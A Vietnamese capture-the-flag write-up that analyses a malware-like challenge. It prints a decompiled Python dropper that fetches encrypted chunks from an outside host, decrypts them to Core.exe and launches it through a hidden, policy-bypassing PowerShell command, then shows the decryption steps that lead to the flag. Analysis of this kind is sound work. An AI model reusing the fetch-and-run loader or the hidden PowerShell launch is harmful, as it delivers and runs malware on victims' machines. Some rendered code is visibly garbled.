# Writeup challange IPC2 (viblo ctf)

## Decompile python file `NewUpdatePatch.exe` được source

```python
import os
import codecs
import urllib.request

# Hand-rolled Base64 decoder: each input character is looked up (by value) in a
# table of 6-bit strings, the bits are concatenated, cut into 8-bit groups and
# turned into bytes. '=' padding is stripped first, a trailing group shorter
# than 8 bits is dropped, and characters missing from the table add no bits.
# The table appears to be the standard Base64 alphabet keyed by 6-bit value.
def br4c3(ct): #string
    ct = ct.replace('=', '')
    base64_dict = {"110000": "w", "110001": "x", "110101": "1", "110100": "0", "010100": "U", "010101": "V", "001100": "M", "001101": "N", "011110": "e", "011111": "f", "001001": "J", "001000": "I", "011011": "b", "011010": "a", "000110": "G", "000111": "H", "000011": "D", "000010": "C", "100100": "k", "100101": "l", "111100": "8", "111101": "9", "100010": "i", "100011": "j", "101110": "u", "101111": "v", "111001": "5", "111000": "4", "101011": "r", "101010": "q", "110011": "z", "110010": "y", "010010": "S", "010011": "T", "010111": "X", "010110": "W", "110110": "2", "110111": "3", "011000": "Y", "011001": "Z", "001111": "P", "001110": "O", "011101": "d", "011100": "c", "001010": "K", "001011": "L", "101101": "t", "000000": "A", "000001": "B", "100111": "n", "100110": "m", "000101": "F", "000100": "E", "111111": "/", "111110": "+", "100001": "h", "100000": "g", "010001": "R", "010000": "Q", "101100": "s", "111010": "6", "111011": "7", "101000": "o", "101001": "p"}
    ct_bi = ""
    for i in ct:
        keys = [k for k, v in base64_dict.items() if v == i]
        keys_str = "".join(keys)
        ct_bi += keys_str
    ct_bi = [ct_bi[i:i+8] for i in range(0, len(ct_bi), 8)]
    if len(ct_bi[-1]) != 8:
        ct_bi.pop()
    fin = b''
    for i in ct_bi:
        fin += bytes.fromhex(hex(int(i.encode(), 2))[2:].zfill(2))
    return fin #bytes

MOD = 256

# KSA + PRGA below are the two halves of RC4: key scheduling over a 256-entry
# permutation, then the keystream generator.
def KSA(key):
    key_length = len(key)
    S = list(range(MOD))
    j = 0
    for i in range(MOD):
        j = (j + S[i] + key[i % key_length]) % MOD
        S[i], S[j] = S[j], S[i]
    return S

def PRGA(S):
    i = 0
    j = 0
    while True:
        i = (i + 1) % MOD
        j = (j + S[i]) % MOD
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % MOD]
        yield K

def get_keystream(key):
    S = KSA(key)
    return PRGA(S)

# XORs every byte of `text` with the next keystream byte. The result goes
# through a hex string and back to bytes, which does not change the values.
def encrypt_logic(key, text):
    keystream = get_keystream(key)
    res = []
    for c in text:
        val = ("%02X" % (c ^ next(keystream)))
        res.append(val)
    return bytes.fromhex(''.join(res))

# encrypt and decrypt both call encrypt_logic: the XOR stream is its own inverse.
def encrypt(key, plaintext):
    return encrypt_logic(key, plaintext)

def decrypt(key, ciphertext):
    #ciphertext = codecs.decode(ciphertext, 'hex_codec')
    res = encrypt_logic(key, ciphertext)
    return res

# Fetches link_where/data_1 .. data_<droprange> with urlretrieve into the
# working directory, appends each file's text to one string, and removes the
# file again with the Windows `del` command.
def getRekt(link_where, droprange):
    payl = ''
    for i in range(droprange):
        urllib.request.urlretrieve(link_where + f'/data_{str(i + 1)}', f'data_{str(i + 1)}')
        with open(f'data_{str(i + 1)}', 'r') as f:
            payl += f.read()
        os.system('del {0}'.format(f'data_{str(i + 1)}'))
    return payl

# Base64-decodes `rac` with br4c3, then RC4-decrypts the bytes with key `kei`.
def Decryptor(rac, kei):
    fin = decrypt(kei, br4c3(rac))
    return fin

# Keeps only the characters of `string` whose code point lies in
# ord(specif)..ord(ficeps) inclusive and returns them as bytes.
def retr(specif, ficeps, string):
    r3v3 = b''
    idx = 0
    while idx < len(string):
        if ord(string[idx]) in range(ord(specif), ord(ficeps) + 1):
            r3v3 += ord(string[idx]).to_bytes(1, byteorder='big')
        idx += 1
    return r3v3

# NOTE(review): the emoji on the next line looks like a renderer's emoticon
# substitution for "8)" -- presumably the call was getRekt(..., 8); confirm
# against the decompiled file.
rac = getRekt('http://192.168.111.130:8080/drop_data', 😎
# NOTE(review): spaces inside this literal fall in the kept range ' '..'~' and
# so become key bytes; the page rendering may have altered whitespace or the
# non-ASCII characters, so take the literal from the decompiled file.
string = """ƚ‘Í ܜ“ùïÔÓ©·è‹Õo¿‘ÇÎεöæ¨ ‹¼y¶øä†í„Ùß ’Ž–ÃÜi€ªór•šÄoʵsÇÅ ¿×¥eɪ¢Àr ׅƒi¢ÿ½h†Ã­˜ØÕsۓ¼×ú ÷Ü«˜£aÞÈ䄴ñ”êÊÓÆ¡Ððð”ˆh³ú®ÅÅÉÛµ“¯"""
specif = ' '
ficeps = '~'
# RC4 key = the ' '..'~' characters filtered out of `string`, reversed by [::-1].
with open("Core.exe", 'wb') as f:
    f.write(Decryptor(rac, retr(specif, ficeps, string)[::-1]))
# Starts the dropped Core.exe through PowerShell with an execution-policy
# bypass and a hidden window (argument names are written in mixed case).
# Observable artefacts for detection: GETs for /drop_data/data_<n> on
# 192.168.111.130:8080, Core.exe created in the working directory, and this
# powershell.exe command line.
os.system('powershell.exe -eXeCUtiOnpOlICy BYpAss -WiNdOWstYlE hiDdEn .\Core.exe')
```

## Lấy data biến rac trong pcap với câu lệnh
```tshark -nr /mnt/c/Users/ASUS/Desktop/Capture.pcapng -Y '(http) && (frame.len == 1078)' -T fields -e data.data| tr -d '\n' | xxd -r -p```

### Chạy lại code được file `Core.exe`

```python
import os
import codecs
import urllib.request

# Analysis copy of the decompiled dropper above: the routines are unchanged.
# Only the tail differs -- `rac` is pasted in instead of downloaded, and the
# PowerShell launch is left out, so Core.exe is written to disk but not run.

# Hand-rolled Base64 decoder (see the decompiled listing above).
def br4c3(ct): #string
    ct = ct.replace('=', '')
    base64_dict = {"110000": "w", "110001": "x", "110101": "1", "110100": "0", "010100": "U", "010101": "V", "001100": "M", "001101": "N", "011110": "e", "011111": "f", "001001": "J", "001000": "I", "011011": "b", "011010": "a", "000110": "G", "000111": "H", "000011": "D", "000010": "C", "100100": "k", "100101": "l", "111100": "8", "111101": "9", "100010": "i", "100011": "j", "101110": "u", "101111": "v", "111001": "5", "111000": "4", "101011": "r", "101010": "q", "110011": "z", "110010": "y", "010010": "S", "010011": "T", "010111": "X", "010110": "W", "110110": "2", "110111": "3", "011000": "Y", "011001": "Z", "001111": "P", "001110": "O", "011101": "d", "011100": "c", "001010": "K", "001011": "L", "101101": "t", "000000": "A", "000001": "B", "100111": "n", "100110": "m", "000101": "F", "000100": "E", "111111": "/", "111110": "+", "100001": "h", "100000": "g", "010001": "R", "010000": "Q", "101100": "s", "111010": "6", "111011": "7", "101000": "o", "101001": "p"}
    ct_bi = ""
    for i in ct:
        keys = [k for k, v in base64_dict.items() if v == i]
        keys_str = "".join(keys)
        ct_bi += keys_str
    ct_bi = [ct_bi[i:i+8] for i in range(0, len(ct_bi), 8)]
    if len(ct_bi[-1]) != 8:
        ct_bi.pop()
    fin = b''
    for i in ct_bi:
        fin += bytes.fromhex(hex(int(i.encode(), 2))[2:].zfill(2))
    return fin #bytes

MOD = 256

# RC4 key scheduling.
def KSA(key):
    key_length = len(key)
    S = list(range(MOD))
    j = 0
    for i in range(MOD):
        j = (j + S[i] + key[i % key_length]) % MOD
        S[i], S[j] = S[j], S[i]
    return S

# RC4 keystream generator.
def PRGA(S):
    i = 0
    j = 0
    while True:
        i = (i + 1) % MOD
        j = (j + S[i]) % MOD
        S[i], S[j] = S[j], S[i]
        K = S[(S[i] + S[j]) % MOD]
        yield K

def get_keystream(key):
    S = KSA(key)
    return PRGA(S)

# XOR of the input bytes with the keystream; used for both directions.
def encrypt_logic(key, text):
    keystream = get_keystream(key)
    res = []
    for c in text:
        val = ("%02X" % (c ^ next(keystream)))
        res.append(val)
    return bytes.fromhex(''.join(res))

def encrypt(key, plaintext):
    return encrypt_logic(key, plaintext)

def decrypt(key, ciphertext):
    #ciphertext = codecs.decode(ciphertext, 'hex_codec')
    res = encrypt_logic(key, ciphertext)
    return res

# Kept from the dropper but no longer called in this copy.
def getRekt(link_where, droprange):
    payl = ''
    for i in range(droprange):
        urllib.request.urlretrieve(link_where + f'/data_{str(i + 1)}', f'data_{str(i + 1)}')
        with open(f'data_{str(i + 1)}', 'r') as f:
            payl += f.read()
        os.system('del {0}'.format(f'data_{str(i + 1)}'))
    return payl

# Base64-decode, then RC4-decrypt with key `kei`.
def Decryptor(rac, kei):
    fin = decrypt(kei, br4c3(rac))
    return fin

# Filters `string` down to the characters in ord(specif)..ord(ficeps).
def retr(specif, ficeps, string):
    r3v3 = b''
    idx = 0
    while idx < len(string):
        if ord(string[idx]) in range(ord(specif), ord(ficeps) + 1):
            r3v3 += ord(string[idx]).to_bytes(1, byteorder='big')
        idx += 1
    return r3v3

# rac: the text carved from the capture with the tshark command above; the
# literal itself is elided on this page.
rac = "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"
string = """ƚ‘Í ܜ“ùïÔÓ©·è‹Õo¿‘ÇÎεöæ¨ ‹¼y¶øä†í„Ùß ’Ž–ÃÜi€ªór•šÄoʵsÇÅ ¿×¥eɪ¢Àr ׅƒi¢ÿ½h†Ã­˜ØÕsۓ¼×ú ÷Ü«˜£aÞÈ䄴ñ”êÊÓÆ¡Ððð”ˆh³ú®ÅÅÉÛµ“¯"""
specif = ' '
ficeps = '~'
# Writes the decrypted second stage to Core.exe for static analysis only.
with open("Core.exe", 'wb') as f:
    f.write(Decryptor(rac, retr(specif, ficeps, string)[::-1]))
```

## Sử dụng dnspy để decompile

Viêt lại code C# để decrypt

```csharp=
using System;
using System.Text;
using System.Security.Cryptography;

public class Program
{
    public static void Main()
    {
        // Layout of one command string, as parsed below:
        //   prefix | 44 chars Base64 key | Base64 ciphertext | last 24 chars Base64 IV
        // A leading 'O' means a 6-character prefix ("Orange" in the samples) and
        // selects CBC with zero padding; anything else is treated as a 9-character
        // prefix ("Tangerine" in the samples) and selects ECB with PKCS7 padding.
        string command = "TangerineYWEyMThhNmJlNzBjMDY5YjU4YTRlOGViY2NiYzQ1ZGM=9QM8aVkrYelwZAQa/6hRVH9d1Pnj9avOITGadElGdhI82TsJ566sp+WfqpaT3Gq+WDl7WkMmPzgoU0VHalEnTQ==";
        bool flag = true;
        if (command[0] == 'O')
        {
            command = command.Substring(6);
        }
        else
        {
            command = command.Substring(9);
            flag = false;
        }
        string instr = command.Substring(0, 44);
        string s = command.Substring(command.Length - 24);
        // 68 = 44 (key) + 24 (IV): what remains in the middle is the ciphertext.
        string instr2 = command.Substring(44, command.Length - 68);
        // Key and ciphertext are Base64-decoded and byte-reversed; the IV is only decoded.
        byte[] key = Program.modifBytesString(instr);
        byte[] array = Program.modifBytesString(instr2);
        byte[] iv = Convert.FromBase64String(s);
        Aes aes = Aes.Create();
        if (flag)
        {
            aes.KeySize = 256;
            aes.Mode = CipherMode.CBC;
            aes.Key = key;
            aes.IV = iv;
            aes.Padding = PaddingMode.Zeros;
        }
        else
        {
            aes.KeySize = 256;
            aes.Mode = CipherMode.ECB;
            aes.Key = key;
            // ECB has no IV input, so this assignment should not affect the output.
            aes.IV = iv;
            aes.Padding = PaddingMode.PKCS7;
        }
        ICryptoTransform cryptoTransform = aes.CreateDecryptor(aes.Key, aes.IV);
        byte[] bytes = cryptoTransform.TransformFinalBlock(array, 0, array.Length);
        string @string = Encoding.UTF8.GetString(bytes);
        cryptoTransform.Dispose();
        Console.WriteLine(@string);
    }

    // Base64-decodes `instr` and returns the bytes in reverse order.
    public static byte[] modifBytesString(string instr)
    {
        byte[] array = Convert.FromBase64String(instr);
        Array.Reverse(array, 0, array.Length);
        return array;
    }
}
```

Thay command bằng các chuỗi sau

```
["TangerineNjNmZDBhZTA0Y2NiZDkwOTUzNDRkYmZiNjg5YjU1N2Q=wyUmYR2lTQg6VVKYOdBqdA==MHQ1eUhoQUBOUW5lKUFJSA==",
"TangerineZTU4MmYxMmNkZjljY2MyYjQ5MTRkZGIwOWNlMGMwMzE=c52cPan7syNuXYzd5LeqGg==ekonMjhFNFBbYk9QZEAuXQ==",
"OrangeNGNjY2U0YzMwY2M1YzdjODBhYjQ2ODc5MDc4ODdjYTc=z8eAC+qJLmvcBIsYzfsr6w==MShdLmFBQXRgbSF8fEtVaw==",
"TangerineYWEyMThhNmJlNzBjMDY5YjU4YTRlOGViY2NiYzQ1ZGM=9QM8aVkrYelwZAQa/6hRVH9d1Pnj9avOITGadElGdhI82TsJ566sp+WfqpaT3Gq+WDl7WkMmPzgoU0VHalEnTQ==",
"OrangeNjQyM2VjYmQzNDllMzcxODUxYTQ3YzI0OTkzMzU2MTk=c/Vei7WoicK2KcdQM0xffb+sDRWt5JhSxW5UoWaxYHsQ3v3jsaTZ055FVSkzF7/jYmojXnEiIX0pJ284PzohWA==",
"OrangeMDZlZTNlNzEzZjBiYWZkYTI4YjRlMDM5ODdjMDFjZjg=/PWhHxAW0VXJ/PWcRq8XtzbyQ0gymME4NjVAYNL1U7KPp5b6SVd8g459VELckswSGlggddKDBkHnrN6MqSHgWAQ5Hxb6BzWxFpsnQm2XBms=ID4lXXp/N300fF1te0phIQ==",
"OrangeMjQ2NmI1ZTk4ZDhmNTRkYTljZTQ1MWQxZTMwMjY5MWE=cGMyqJiqPFKNw7I8LNtWJQDfTJMBY6GRT13SK5v/7AQ=dkRmISIxMV99TGZ8clI0Qg==",
"OrangeM2Q3MzlkZmFjZDIyZTViYWIxZjRkMjkzZTJhNWFlOTk=/eyhd8CFueVJ7IMnUPJVdcxbQiPmjLCnR+VST6E9owk=LDlZZGB5Y0tBQ28zV3JbbQ==",
"OrangeZDc1ODRlMGJhMzViYjhmYjdkZTRjMTFkMGQyYzljYmM=YBgFkL0d4jDL2MFqWiabe9iG4Em+m1OYeU6Kw+fCu7Y=UyZ1OH0neDJuZSYjLDU8ZA==",
"OrangeNDA1NTgyNWE2MWQ5MzA3ODJmNDQ5NWNiMzg1MWVlZDA=4txrI3nrgb/RJMdI6tYx/9p1Gvs76+r200AwYjD9rTs=Jk07QltWWHA+b102K1d1Nw==",
"TangerineYTRlN2U0ZTdmZjViY2IxYmEyMzRhNWU1MzBiM2VkOTk=5dBprptGmjMb0uu4llH/KA==TUolaH9WXDhXdUJvcjgyUg=="]
```

Được nội dung của file password `b'](leZd*PkwSY%D3a,fUQ \n'`

## Export file `Encryptor.py`, đọc code và decrypt ảnh

Code decrypt

```
from PIL import Image
from hashlib import sha256
import random

# Reverses the XOR masking applied to one rectangle of IPC_FlagENC.png by
# replaying the same seeded pseudo-random byte sequence; XOR is its own inverse.
img = Image.open("IPC_FlagENC.png")
newimg = Image.new(img.mode, img.size)
pix = newimg.load()
# The hashed bytes must equal the recovered password exactly, including the
# trailing space and newline shown in the b'...' value above.
password = open("password.txt", "r").read().encode()
print(password)
# Seed = the ASCII hex digest of SHA-256(password), passed to random.seed as bytes.
key = bytes(sha256(password).hexdigest().encode())
random.seed(key)
for y in range(img.size[1]):
    for x in range(img.size[0]):
        # Unpacking three values assumes a 3-channel (RGB) image.
        r, g, b = img.getpixel((x, y))
        # Only the rectangle y 686..729, x 450..1479 is XORed; all other
        # pixels are copied unchanged.
        if y in range(686, 730) and x in range(450, 1480):
            # Draw order is r, b, g (not r, g, b); it has to match the order
            # used by Encryptor.py, which this page does not show.
            r ^= random.randint(0,255)
            b ^= random.randint(0,255)
            g ^= random.randint(0,255)
            pix[x, y] = r, g, b
        else:
            pix[x, y] = r, g, b
newimg.save("IPC_Flag.png")
```

Flag{1nt3r4s7r@L_p3AcE_Corpor4t10n_S_E_C_R_E_T}